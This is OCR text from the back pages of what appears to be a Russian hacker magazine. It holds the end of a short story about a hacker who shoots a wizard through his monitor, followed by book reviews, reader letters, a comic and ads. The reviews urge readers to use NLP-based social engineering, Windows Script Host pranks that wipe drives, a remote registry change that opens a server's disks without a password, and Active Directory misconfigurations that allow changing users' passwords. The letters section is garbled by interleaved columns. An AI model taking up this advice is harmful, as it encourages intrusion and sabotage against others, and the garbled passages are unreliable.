оно просматривалось. То есть Loader смотрел не саму запись, а то, как кто-то смотрит в мо- 
нитор! 

Он остановил запись и отошел на несколько шагов. Хотелось верить в то, что это все ему при- 
виделось, что ничего этого на самом деле нет - но черная полоса вокруг изображения с каж- 
дой минутой все сильней бросалась в глаза. 

Глубоко вздохнув, Loader продолжил исследование видеозаписи и пришел к выводу, что эта по- 
лоса появилась за несколько секунд до его входа в помещение. После этого он уже не сомне- 
вался в том, что все, что произошло внутри обменного пункта, было каким-то образом подстро- 
ено неизвестным под ником «Wizard». Он сцепил руки перед собой и задумался. 

- Зачем все это? - рассуждал он, продолжая смотреть на экран своего телевизора, где в оче- 
редной раз погибали преступники от эффектных выстрелов Loader’a и кассирши. - Кому может 
быть нужно подставить меня с деньгами? Все это похоже на какой-то грязный эксперимент... А 
это что такое? - дернулся он, увидев, как перед экраном что-то довольно быстро пронеслось - 
что-то мутное, расплывшееся от энергии движения. 
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« Жаль. Вы, люди, очень странные. Придется поменять тему диссертации» . 


Loader кинулся к пульту и остановил изображение, после че- 
го вернулся на несколько секунд назад и удивился тому, как 
он мог не заметить это раньше - на замедленном воспроизве- 
дении было видно, что перед экраном прошла чья-то ладонь. 
- Я уже ничего не понимаю, прошептал Loader, просмотрел 
все несколько раз и сел на диван, обхватив голову руками. 
- Мне кажется, что все это просто бред какой-то. 

Несмотря на кажущуюся панику, Loader внутри был сосредото- 
чен, как никогда, - в его мозгу шла напряженная работа, от- 
сеивающая факты от надуманных выводов. Он кивал головой сам 
себе, что-то бормотал под нос, пару раз порывался вскочить, 
но силой удерживал себя на диване. 

Все, что случилось с ним в течение последних двух дней - да 
нет, в течение последних нескольких часов! - полностью пе- 
реворачивало его представления об окружающем мире. Он, как 
человек практичный, прекрасно знал, что солнце встает на 
востоке, что после зимы идет весна, что бога нет, а есть 
Интернет - но сейчас, когда он, наконец, понял для себя, 
что за руку он только что видел на экране, он бы уже не уди- 
вился, если бы все прописные истины изменились на прямо про- 
тивоположные . 

Разгадка казалась фантастичной. Изображение на экране не бы- 
ло видеозаписью в прямом смысле - кто-то неизвестный смот- 
рел сквозь объектив служебной видеокамеры на происходящее в 
комнате, и пишущая головка магнитофона записала TO, ЧТО ВИ- 
ДЕЛИ ЧУЖИЕ ГЛАЗА. 

Некто, глядя на Loader’a, просто поправил волосы рукой - ее- 
то и видел хакер на экране. Осознав это, ему вдруг стало 
очень страшно - будто он сам смотрел на жизнь глазами 
Wizard’a - а то, что это были именно его глаза, Loader уже 
не сомневался. 

И в момент озарения он вновь услышал стук за спиной. На этот 
раз он не испугался. Он уже понял, как выйдет из этого по- 
ложения, но вначале надо было узнать - зачем Wizard так с 
ним поступил. 

Аккуратно выключив видеомагнитофон и телевизор и положив 
пульт на диван, он наклонился и поднял с пола пистолет, 
щелкнув предохранителем. После чего подошел к компьютеру и 
открыл пришедшее сообщение. 

«Кассета у тебя?» 

Loader усмехнулся. Конечно же, Wizard волновался - это чув- 
ствовалось по всякому отсутствию вступлений и явно невежли- 
вому началу (обращение на «вы» исчезло, будто его и не бы- 
ло). 

Пододвинув к себе клавиатуру, он отстучал: 

«Да». 

«Смотрел?» 

«Да». 

«Интересно?» 

Loader задумался. Интересным это назвать было нельзя. He- 
сколько часов назад он застрелил двух человек, еще неизве- 
стно, чем все это закончится. Подумав, Loader ответил: 

«Не очень». 

«Задавай вопросы». 

Хакер поразился тому, как точно собеседник угадывал направ- 
ление разговора - действительно, у него на языке вертелись 
несколько вопросов, без ответов на которые жить дальше бы- 
ло просто невыносимо. 

«Зачем?» 

«Что?» 

«Это вопрос - ЗАЧЕМ все это?» 

«Ответить одновременно и просто, и сложно. Разбей вопрос на 
составные части». 

«Зачем ты засунул деньги мне в карманы?» 

Пауза. Loader напрягся - показалось, что Wizard готов пре- 
кратить разговор. 

«Эксперимент». 

Все было так, как и рассуждал хакер, - в своих мыслях он 
тоже называл все происходящее экспериментом. 

«Тема?» 

Опять пауза. Loader до боли всматривался в экран, словно бо- 


ялся того, что если он отвернется, то контакт с Wizard’om 
прервется. 

«Не обижайся... Тема - нечестные деньги». 

«Конкретней». 


«Я еще не до конца понял, что такое «хакер», но я знаю, что 
те деньги, которые лежали на твоем столе два дня назад, бы- 
ли заработаны нечестным путем - ты добыл какую-то информа- 
цию преступным путем, за что и получил вознаграждение». 
«Кто ты? Какое тебе дело до происхождения моих гонораров?» 
Loader, честно признаться, испугался - Wizard был неплохо 
информирован. 

«Ничего не имею против тебя, Loader. Мне было интересно, как 
ты отреагируешь, если деньги будут уплывать от тебя на TBO- 
их же глазах... Ты здорово вел себя - как заправский стре- 
лок». 

«Но ведь это были не те деньги, что лежали в шкафу!» 

«У меня не достало сил переместить их в пространстве - их 
хватило только на то, чтобы сунуть в твои карманы те день- 
ги, что были ближе всего». 

Loader закрыл глаза - он не только убийца, но и вор. День- 
ги из обменного пункта все-таки оказались у него дома. Как 
же он не задумался над их происхождением, когда увидел в 
шкафу четыре пакета?.. 

«Эксперимент удался?» 

«Нет. Я надеялся на обратное». 

«На то, что я не буду драться за свои деньги? Смешно! Аб- 
солютно неважно, как они были заработаны - а теперь их у 
меня в два раза больше, и ты знаешь, что и последние два 
пакета тоже получены нечестным путем». 

«Жаль. Вы, люди, очень странные. Придется поменять тему дис- 
сертации». 

«Мы, люди... - подумал Loader. - 0 ком это OH? И что за дис- 
сертация пишется подобными методами - через убийства и ог- 
рабления?» 

Loader замер перед монитором, думая над последним сообщени- 
ем. Он совсем забыл за этим разговором о том, что собирал- 
ся покончить с происходящим. Внимательно посмотрев на эк- 
ран, он убедился в том, о чем подумал, просматривая видео- 
кассету, - его собственное отражение в мониторе было поче- 
му-то в очках, хотя сам Loader очков с рождения не носил. 
В этот момент пришло еще одно сообщение: 

«Я решил сообщить о тебе в соответствующие органы. Ты пре- 
ступник. Все хакеры - преступники. Так меня учил мой на- 
ставник...» 

Loader не стал отвечать. Он вытащил из-под ремня пистолет, 
выставил его прямо перед собой и методично всадил три пули 
в собственный монитор, закрывая глаза ладонью левой руки. 
Трубка с хрустом лопнула, разбрызгивая стекло по углам. Сза- 
ди вылетела пластмассовая панель, со стены упали часы, и все 
стихло. 

Внутри вскрытого выстрелами монитора таяла человеческая го- 
лова - молодой парень в перекошенных на переносице очках 
(одно из стекол было прострелено, из глазницы текла струй- 
ка крови). Шея и плечи были практически не видны, HO Loader 
понял, что они покрыты чем-то вроде мантии. Лицо показалось 
Loader’y очень знакомым; он наклонился поближе, разглядел 
исчезающие черты и понимающе покачал головой - что-то по- 
добное должно было случиться... 


ГАРРИ ПОТТЕР ТАК И НЕ ВЫБИЛСЯ В СТАРОСТЫ. Мечтая об этом, 
он задумал написать диссертацию, подключил к этому нововве- 
дение Академии - компьютер, но... Русский хакер Loader oc- 
тановил его тремя выстрелами сквозь виртуальность. Когда его 
хоронили, гроб не открывали... 

Loader грустно осмотрел свой компьютерный стол, усыпанный 
осколками стекла и пластмассы, и убедился в том, что лицо 
Гарри Поттера окончательно исчезло в пространстве между ми- 
рами. 

- Деньги хакера - честные деньги, - сказал он в пустоту. - 
Никакого волшебства - только мозги, руки и пиво. 

Когда он утром шел по улице, в его кармане лежали деньги на 
покупку «Макинтоша» с жидкокристаллическим монитором - уж в 
нем-то никакая нечисть не спрячется! 
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КНИЖКИ 


Полезные буки по хаку и не только 


конец-таки заслуженное удовольствие после трудно- 

го сетевого хака? И правильно! Себе тоже надо 
иногда отдых давать, но что за жизнь без взлома? По- 
этому мы будем ломать все легко и непринужденно, без 
особого напряга для брэинзов %), а помогут тебе в этом 
книги, которые я сегодня подобрал для тебя, прогулива- 
ясь среди книжных полок с килотоннами интересной и не 
очень инфы. 


| |. что, приятель, решил расслабиться и получить на- 


Гарри Адлер. Технология НЛП. - СПб.: ПИТЕР, 
2001 - 224 с. 


Психология - очень инте- 
ресный способ получения 
нужной информации, даже 
в учебнике по информаци- 
онной безопасности, реко- 
мендованном академией 
ФСБ для ВУЗов по специ- 
альности защита информа- 
ции, есть целая глава, по- 
священная этой области 
взлома системы и утечки 
информации из организа- 
ции. Так что упускать эту 
тему именно в «легком» 
хаке никак нельзя, ведь 
что может быть проще, 
чем подойти и просто рас- 
спросить противника, кото- 
рый даже не подозревает о твоих намерениях. Конечно, 
все сведения, причем сразу, получить не получится, но 
зато, наладив один раз контакт, можно пользоваться и 
пользоваться. Данная книга расскажет тебе об основах 
психологического строения человека и о возможных спо- 
собах войти в доверие к собеседнику и наладить с ним 
отношения. Автор является создателем множества книг 
как по НЛП, так и просто по психологии и гипнозу, и, на- 
до сказать, излагает он свои мысли довольно четко и яс- 
но, объясняя досконально методы определения душевно- 
го состояния человека и, вообще, с какой стороны луч- 
ше всего будет начать общение. И, освоив данную буку, 
ты сможешь на практике применять все доступные спо- 
собы получения нужной тебе информации, то есть, по- 
простому, хакать самый мощный и сложный в мире ком- 
пьютер - человеческий мозг. 

Рекомендуется: всем, для того, чтобы научиться лучше 
понимать людей и осознать, что НЛП - это тоже способ 
хакнуть, причем ничуть не менее эффективный. 
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Андрей Попов. Командные файлы и сценарии 
Windows Script Host. - СПб.: БХВ-Петербург, 
ANID = 920 ©. 


Вот скажи, часто ты хотел 
нагадить ближнему своему? 
Ну там винт форматнуть или 
переместить все документы 
из известной папки куда-ни- 
будь поглубже в недра сис- 
темы? А может, тебе надо- 
ело, что тебя все считают 
ламером из-за того, что, 
кроме васика, который ты 
изучал в школе, тебе ниче- 
го не известно? А для рабо- 
ты проги, написанной на VB, 
требуется либа в полтора 
мега... на дискетку точно не 
влезет... Но чу! ((с) Бу С. 
Есенин.) - начиная с Win98, есть в системе такая мега- 
полезная вещь - Windows Script Host называется. Вот ре- 
шение многих проблем, теперь можно делать с компом не- 
приятеля все, что душе угодно, и, кроме знания основ 
basic’a и этой книги, тебе больше ничего не понадобится 
;). Все делается - проще некуда, впрочем, лучше автора 
этой буки я тебе рассказать все равно не смогу, тем бо- 
лее, что излагает свои мысли товарищ Андрей Попов 
вполне грамотно и понятно, так что с пониманием про- 
блем возникнуть не должно. А глава с названием «Рабо- 
та с файловой системой» и пример, описывающий «пере- 
мещение файлов с протоколированием действий», особен- 
но помогут тебе в нелегком деле западлостроения %). 

Рекомендуется: юным западлостроителям, знающим ва- 
сик %), хотя и остальным тоже будет полезно освоить эту 
буку - много интересного можно делать с помощью WSH. 


Павел Ломакин, Даниэль Шрейн. Анти-хакинг. - 
М.: Майор Осипенко А.И., 2002 - 512 с. 


Мда... я почти обрадовался, 
что перестали на прилавках 
появляться подобные книги, 
которые и в руки-то взять 
не всегда приятно... Эта 
оказалась из той серии... и 
название тоже попахивает 
фекалькой... обидно, това- 
рищи, ну скажите, зачем 
надо писать о старых за- 
юзанных троянах, о давно 
забытых версиях линуха и 
о сервиспаке за номером 3 
для эНТей... Het, конечно, 
может кому и пригодится 
распечатка исходника программы на визуалвасике для 
отыскания паролей в системе или лог TCPDump’a на эн- 
ное количество листов... не знаю... Но очень огорчило 
меня достаточно большое количество ошибок на страни- 
цах книги и присутствие «некоторых» несоответствий, 
взять хотя бы одну из первых страниц - благодарности 
от авторов - авторы говорят спасибо сайту www.hakep.ru. 
Странно, я такого не встречал :), вбиваю адрес и вижу 
- «..данный домен свободен...». Остается предположить, 
что это досадная очепятка и должен стоять линк на все- 
ми любимый :) адрес ксакепа... Нет, после этого отпало 
всякое желание читать книгу и вообще очень захотелось 
засунуть куда-нибудь далеко-далеко этот экземплярчик... 
может, еще пригодится... в качестве макулатуры :). 

Рекомендуется: ну никому, хотя если ты не знаком с ис- 
торией появления компов или хочешь почитать логи от 
всяких программ, то вперед :). 


Джерри Хоникатт. Реестр Microsoft Windows(r) 
2000. - M., СПб., Киев: «ВИЛЬЯМС», 2000 - 320 с. 


Windows 2000... На- 
сколько бы глюкавой 
ни была эта ось, надо 
признаться, что все 
равно огромное коли- 
чество серверов стоит 
именно под управлени- 
ем этого чудного тво- 
рения дяди Билла (не 
такая уж глюкавая... и 
не такое уж огромное... 
;) - прим. ред.). А он, в 
свою очередь, во всю 
скрывает такую вкус- 
ность, как реестр, от 
случайных шаловливых 
ручек :). И в докумен- 
тации виндов нету 
практически никакой инфы по этому делу. Непоря-я-я- 
ядок, надо бы исправить этот пробел в твоих знаниях, 
тем более, что достаточно большое количество багов са- 
мой системы можно исправить только с помощью завет- 
ной команды regedit32.exe. Да, конечно, ты можешь ска- 
зать, что существует много прог для исправления и наст- 
ройки реестра, но подумай, ведь ни одна программа не 
заменит практических знаний и умений, тем более, что 
многие параметры для тонкой настройки нельзя изменять 
с помощью разных там твикеров. А освоив эту книжен- 
цию, ты разберешься во всех тонкостях строения виндо- 
вого реестра, поймешь связь между разными разделами, 
узнаешь, как правильно настроить и отредактировать раз- 
ные параметры для обеспечения большего удобства рабо- 
ты с системой. Расскажет тебе все это автор по-челове- 
чески и безо всяких там заумных слов, непонятно что оз- 
начающих. А наличие в книге множества примеров толь- 
ко обрадует начинающего твикера ;). В виде бонуса мож- 
но отметить такую интересную главу, как «Администриро- 
вание реестра», ведь что может быть проще (если, конеч- 
но, админ не очень блещет знаниями %), чем подрубить- 
ся к реестру другого компа и, например, расшарить все 
диски на полный доступ? Надо изменить всего лишь 1 па- 
раметр в реестре, и удаленный сервер откроет перед то- 
бой все свои секреты, причем безо всякого пароля %), 
но это уже другая история... 

Рекомендуется: тем, кто собирается поломать сервак под 
винтукей или заядлым твикерам с жаждой самообразова- 
ния. 


Wid 1 onl 
Me 


Windows 


Редакция выражает благодарность магазину 
“Библио-Глобус” за предоставленные книги. 


Федор Зубанов. Active Directory. - М.: РУССКАЯ 


РЕДАКЦИЯ, 2002 - 576 с. 


Для тебя, наверное, не 
секрет, что в Windows 
2000 Server входит служ- 
ба каталогов, иначе на- 
зываемая Active Directory, 
и, как и все мелкософ- 
товское, эти самые ак- 
тивные каталоги содержат 
в установке по умолча- 
нию достаточно большое 
количество уязвимостей и 
глюков. А ведь для рабо- 
ты АБ еще нужно устано- 
вить и DNS сервер все 
=| OT той же мелкой фирмы 
a | %). На деле выходит, что 
если админ нормально не 
сконфигурировал все это добро, то ты очень легко и про- 
сто сможешь просмотреть все зоны ДНС, подключиться к 
чужому домену и получить информацию обо всех пользо- 
вателях и даже поменять им пароли! Конечно, эта книга 
написана в основном для админов и рассказывает, как 
же все-таки закрыть все дыры, присутствующие в только 
что установленной системе, но кто мешает тебе, изучив 
эту буку, использовать знания в своих, «добрых» целях? 
:). Автор является достаточно крупным сертифицирован- 
ным специалистом продуктов Microsoft и пытается втереть 
начинающему админу, как же нужно отладить систему, 
правда, вот выходит это у него довольно заумно и груз- 
но... Но есть и реально дельные и полезные советы по 
поиску ошибок в Active Directory, хотя это все для адми- 
нов... Тебе же я могу посоветовать обратить внимание на 
прилагаемый к книге DVD-guck с полезным софтом. Там 
можно обнаружить прогу VMWare (][ как-то писал об этой 
тулзенке, способной создавать виртуальные компы) и не- 
сколько систем с установленной серверной виндой2000 и 
настроенной службой каталога. Все это нужно для тестов, 
без ущерба для здоровья твоей системы, так что ты без- 
болезненно можешь врубить виртуальный комп и доско- 
нально изучить и применить на практике все полученные 
знания и попробовать поломать тестовый домен ;) а по- 
том, зная все тонкости и потайные ходы, тебе всегда бу- 
дет открыт путь на серверные просторы маздая %). 
Рекомендуется: ну конечно же, админам... и юзверям, 
желающим изучить Active Directory на практике... 


раде 121 
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Bathe pail Geant Дарова, Спец : 
: т ь Сижу мышу чищу и думаю: «Дай-ка я напишу письмено, и 
вот написал же». Вы молодцы! Стоко писать и бегать, и 
откуда только силы у вас берутся? В общем, все хорошо 
только достало уже читать письма с нытьем, сломайте, 
плиз, сделайте, плиз, подотрите попку, плиз... Веадегы, надо думать головой! Напрягать 
ногда серое вещество! Как грится: 
«Безтруда не выдернешь и джампер 
3 харда!». Печатаете реальные ЕЕ 
элемы, которые могут помочь To: mei] Сл гиа ки. Дарова и тебе. Силы на то, чтобы по- 
разрешить профи. И, конечно, поже- бегать и пописать, нам хватает, пото- 
лание: не надо прекращать «Взлом» му что нам помогает энергия «Прин- 
ожет, просто два-три «простых» ца»! Вот. Бывалоча выкушаешь литра два пива под этого «Принца» и 


To: зресееа1хаЕер.гы 
Subject: по subj 


Спеца - один взлом? З.Ы. Больше только и делаешь, что бегаешь и писа... пишешь, в смысле :). 

вам сил и желания (оно пропадает Кстати, ты не представляешь, насколько нас достало читать всякое 
часто, правда?) нытье. И именно поэтому мы стараемся выставить наиболее про- 
3.3.Ы. Старкрафт - rulezzzz!!! Служу двинутых нытиков на всеобщее обозрение, чтоб неповадно было. 


онфедерации Вот и в этот раз порадуем публику. Обязательно :). 
Сил хватает, желание есть, «Взлом» обязательно будет, но другой :). 
Так что надейся и жди. Счастливого дембеля! 


Здарова, Spec! (обычное приветствие). Я 
люблю ваш журнал, как говорится, very 
strong, вы правильно делаете, что не 
пишете о всякой муре (типа девушки и 
пиво), за что хотел бы вас поблагодарить 
Вот очень жалко, что к Спецу не идет диск хотя бы на 300 Мег. Почему? Последние номера о взломе 
не то что бы не по 
силам , но и легкими их 
назвать тоже трудно Привет, городские! (обычный от- 
поэтому я очень рад ; вет). Мы тоже вас всех любим 


Бога Пороосказыекаповеи еще ви 


TOSS penitipea | eeskeniatl 
SUIR a cete Bie Des Se uti ва а”, носа mol psn et 


скорому выходу о именно поэтому не пишем о всякой 
легком хаке (жду не муре... Стоп! Кто сказал, что деву! 
дождусь). Ну все, пока ки и пиво - это мура? Это совсем даже не мура, это немереный рулез! Но 
Р.5. Alex сать про них мы не будем - их и во внежурнальной жизни хватает :). Молод 


что осилил сложные Спецы, надеемся, что этот Спец придется тебе по душе. 
Или еще по чему... :) А диск будет вряд ли - и так наглые барыги дерут за Спе 
три шкуры с бедных хацкеров (а самое обидное, что мы не можем на это по- 
влиять :(). Пиши, летучая мышка ждет тебя :). 

З.Ы. Дронич 


а а bilan ld wun Ва а ИИ 
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Дорогой Спец! Сиху я как-то 
kepru на унитазе и читаю ваш номер 
детное чтение про обход огненных стен. По- 

= TOM я узнал, что следующий 
номер будет последним из се- 
рии. А жаль! Ведь у меня есть отличная тема для взломного Спеца. Бара- 
банная дробь... Я предлагаю написать о выдающихся личностях в хаке. 
Например, о Митнике (FREE MITNIK;-). Об их взломах и советах начинаю- 
щим. Вотя кончаю =) и думаю, что хрен они меня послушают, какого-то 
чувака на унитазе! 
З.Ы. Free Mitnik!! 


tie Bart athebar ailrul Bot и дожили! Есть такая 
рульная примета, что журнал 
становится народным, когда 
его начинают читать, сидя на толчке :). Так что мы тут все разом 
загордились. А идея написания биографий выдающихся хацкеров 
давно витает в воздухе, и, возможно, мы таки воплотим ее в жизнь в 
одном из ближайших номеров. Так что можешь считать, что в твоем 
любимом журнале (ведь это же Спец, правда? :)) прислушиваются KO 
мнению любых читателей. Даже сидящих на унитазе :). 

З.Ы. А Митника-то давно выпустили °). 


Уважаемая редакция моего любимого журнала! Не- 
лавно мне в руки попал ваш номер про DoS-artaku. С 
удовольствием зачитал его до дыр! Молодцы! Супер! 
Из него же я узнал, что вы печатали целую серию но- 
меров про взлом. Но у меня такая проблема: я живу 
на отшибе цивилизации, и ваш журнал попадает к нам очень поздно и очень нерегулярно. Не мог- 
ли бы вы отписать мне на мыльник, какие еще номера про взлом вы уже выпустили и собираетесь 
еще выпустить? И еще вопрос: можно ли каким-нибуль образом заказать ваши прошлые журналы 
или хотя бы подписаться на следу- 
ющие (по почте подписываться не 
хочу, так как в нашу лырень журна- 
лы приезжают чуть ли не через пол 

после выхода)? Заранее 
си больших респектов! 
Девайс 


Уважаемый читатель наше- 
ЕЩЕ : ro любимого журнала! Если 
бы дыры, до которых ты за- 
читал несчастный экземп- 
ляр Спеца, были поменьше, то ты узрел бы такую замечательную LUTY- 
ку, как редакционная подписка. Это, типа, такая навороченная подпис- 
ка для особо продвинутых хацкеров — журнал будет приходить гораздо 
быстрее, чем по почте, а заодно ты огребешь тучу всяких приятных бо- 
нусов (вроде призов и халявных журналов). Так что срочно ищи объяву 
о редподписке в этом номере и вперед. 

БооКивайс Дронич 


ш СооХаЦкеры! 
ачал читать вас с номера о 
DOS’e, т.е. недавно). 

Также я читаю «)(акера обычного». 
Вы лучШше! Ваш журнал почти 
100% о НАСК’е!! А в «обычном» бывает -30%. Никого не хочу обижать... Молотки, 
перцы! RULEZZZ! 


Good Luck! 

С уважением Shoal бакегаарейсязяеи Hu и тебе, Греман! 

GremaN! Про сто процентов ты, конечно, 
Р.5. Я думаю, что погорячился, но мы стараемся :). 
вряд ли это письмо По крайней мере несколько 
будет напечатано... СПЕЦиальных постоянных рубрик точно идут на пользу читателям 
Но вам все равно (судя по отзывам народа). А представляешь, что будет, если (когда!) 
спасибо! мы начнем писать не про взлом, а про... да про что угодно! Так что 

забьем всех своими потугами! Мы ж молотки... 


А письмо мы не просто публикуем, а еще и награждаем. Пиши и 
забирай своего Бата. 


ЧТО ТЫ, СЦУКА, 
БУДЕШЬ ДЕЛАТЬ 
ДОЛБАНЕШЬ КЛЮКОЙ 
С РАЗВОРОТА, А Я ТЕБЯ 


ПЕРЕПРЫГНУ... 

СЕГОДНЯ ПОЛУЧИТСЯ... | 

ОБЯЗАТЕЛЬНО | 
ПОЛУЧИТСЯ! 


“СУПЕР”, ` 


ЛУЧШЕ 
РАССКАЖИ, 
ЧТО ЭТО И 


КАК ЭТО? 


ПОТРЯСАЮЩАЯ ИГРА! 


! ПОБЕДИТЕЛЬ НАГРАЖДАЕТСЯ 


СУПЕРНАБОРОМ “МЕНТАЛЬНОЙ 
РЕАЛЬНОСТИ” ОТ КОМПАНИИ } 
‚НЕЙРОСОФТ”. РАССКАЖИТ 


СУПЕР! Я 
НАДРАЛ ЕМУ 
ЗАД, КАК 
‚В РЕАЛЕ, 


Я ДУМАЮ, 


и ЭТО — ТО САМОЕ, % 


ПОЛНОЕ ПРИСУТСТВИЕ. 
И ЕЩЕ, БОЛЬ ВСЕГДА 
ХОТЕЛ КЛЮШКУ 
С ЛЕЗВИЕМ, 

А Я TOAbKO 
И ТРЕНИРОВАЛ 
ЭТОТ ПРИЕМ... 


ДА, ЗАСАДА... 
НУЖНО ОПРОБОВАТЬ \ 
ЭТОТ НАБОР, А ГЛАВНОЕ 
ДОБРАТЬСЯ ДО ТОЙ 4 
ИНФЫ... 


РЕБЯТА, Я РЕШИЛА: 

F ЯДАМ BAM СВОЙ 

| СУПЕРАД. НО ОБЕЩАЙТЕ 
& МНЕ БЫТЬ ОЧЕНЬ 
ОСТОРОЖНЫМИ. 


НЕМНОГО 
ПОЗЖЕ... 


ЕСЛИ Я ЧТО-ТО 

ПОНИМАЮ В МЕНТАЛТРОНИКЕ, 
ТО ЗДЕСЬ СТОИТ ФИЛЬТР СИГНАЛА 

С “ТВОРЧЕСКОЙ” ЗОНЫ МОЗГА. © 
ТИПА, ЧТОБЫ ЧУВАКИ СЛУЧАЙНО 

КАКИХ-НИБУДЬ КОШМАРОВ 

CEPBAKY HE НАПЕРЕДАВАЛИ И НЕ 

ПОУБИВАЛИ ТАМ ДРУГ ДРУГА. uf oy 


МЫ СМОЖЕМ 
ПОДЖАРИТЬ СЕБЕ 
МОЗГИ OT 
ПЕРЕНАПРЯЖЕНИЯ. 
ВОСПРИЯТИЕ-ТО 


ТОЖЕ УВЕЛИЧИТСЯ, 


хо РАЗ ЭДАК 


| ОНИ НАС ЧТО 
ИДИОТСКИМИ СОБАКАМИ 
СЧИТАЮТ? НАДО ЭТУ 
ХРЕНЬ ОБОЙТИ, ТОГДА 
МЫ СМОЖЕМ ВСЕЙ 
ОКРУЖАЮЩЕЙ СРЕДОЙ 


РЕБЯТЯ, 
ЭТО ЖЕ 
ОПАСНО! 


ГОБЛИН! 
42! 

HET, ТАКАЯ 
МАЗА МНЕ 


oro! 
ДА ЖИЗНЬ TYT \ 
ПРОСТО КИПИТ! 
А Я ДУМАЛ, 

НА ЭТОМ СЕРВАКЕ 
ТРИ С ПОЛОВИНОЙ 


ОТКУДА 
У РУРЖУЕВ 
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B CAEDYIOUWIEM 
НОМЕРЕ 


Порядком устав от серии по взлому, мы решили оттянуться и устроить праздник 
себе и читателям. Куча интересной и полезной инфы ждет тебя! А заодно, 
возрождая традиции, мы публикуем «Команду version 2.0» - досье Ha Спец-Крю 
образца 2002-2003 года. И еще: жди подробного отчета о BCM2, в которых 
ты можешь поучаствовать лично :). Новогодний отрыв близится! Не проспи, 

а то замерзнешь... 


НА ПИКЕ ВЫСОКИХ 
ТЕХНОЛОГИИ 


ЕЕ 577LH 

15'’ ЖК-монитор — 

совершенный дизайн, воплощение 
передовых технологий 


ТЕХНОТРЕЙД 


МОНИТОРЫ ИЗ ПЕРВЫХ РУК 


МАГАЗИНЫ РОЗНИЧНОЙ ТОРГОВЛИ: 


М.видео: 777-777-5 
пр. Мира, 4.91, к.1 
Измайловский вал yn., д. 3 
Пятницкая ул., д. 3 


Автозаводская yn., д. 11 
Ленинградское ш., д.16, стр.1-2 
ул. Люблинская, д. 169 
Чонгарский бул., д. 3, к. 2 
Маросейка ул., д. 6/8, стр.1 Никольская yn., д. 8/1 
Большая Черкизовская ул., д.1 Столешников nep., д. 13/15 
ISM: 785-5701, 787-7781, 280-5144, 210-8340 
Нахимовский пр-т, д. 24 Протопоповский nep., д. 6 
Университетский пр-т, д. 6 корп.3 Яблочкова yn., д. 12 

Ф Центр: 472-6401, 205-3666, 785-1785 

Сухонская yn., д. 7a Выставочно-деловой центр на «ВВЦ», 
пав. 71, 1 этаж, Мантулинская yn., д. 2 

Сеть компьютерных центров POLARIS 

Единая справочная служба: 7555557 
Радиокомплект-компьютер: 953-8178, 424-7157 
Ул. Бахрушина д. 17, стр. 2 

Старт-Мастер: 935-3852, 784-6383, 231-4911 

м-н. Электроника Ленинский пр-т. д. 99, 


ЕТ 775FT 

абсолютно плоский 17"’ экран, 
идеальное соотношение 
цена/качество 


Дистрибуторская компания 


Тел.: 291-2686, 291-5769, 291-5870; Факс: 291-5794 
E-mail: technotrade@technotrade.ru 


ОПТОВЫЕ ПРОДАЖИ: 

ELSIE - Варшавское w., д.125, тел. 777-9779 

ELST - Рязанский пр-т., д. 59, тел. 728-4060 

CITILINK - Народного ополчения ул., д. 34, тел. 745-2999 

ISM - Нахимовский пр-т, д. 24, тел. 785-5701 

ДЕНИКИН - Огородный np., д.8, тел. 787-4999 

ИНЛАЙН - г. Долгопрудный Московской области, 
Первомайская yn., д. З/Ц, тел. 941-6161 

ИНТАНТ - г. Томск, тел. (3822) 420-224, (3822) 420-234 

Никс - Звездный бульвар, д. 19, тел. 216-7001 

NT Computer - Волоколамское ш., д. 2, тел. 755-5824 

Олди - Трифоновская yn., д. 45 тел. 284-0238 

Сетевая лаборатория - ул. Тимирязевская д.1/4 тел. 784-6490 
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freedom of mind 


ТЕХНОТРЕЙД приглашает к сотрудничеству региональных дилеров и магазины розничной торговли. 
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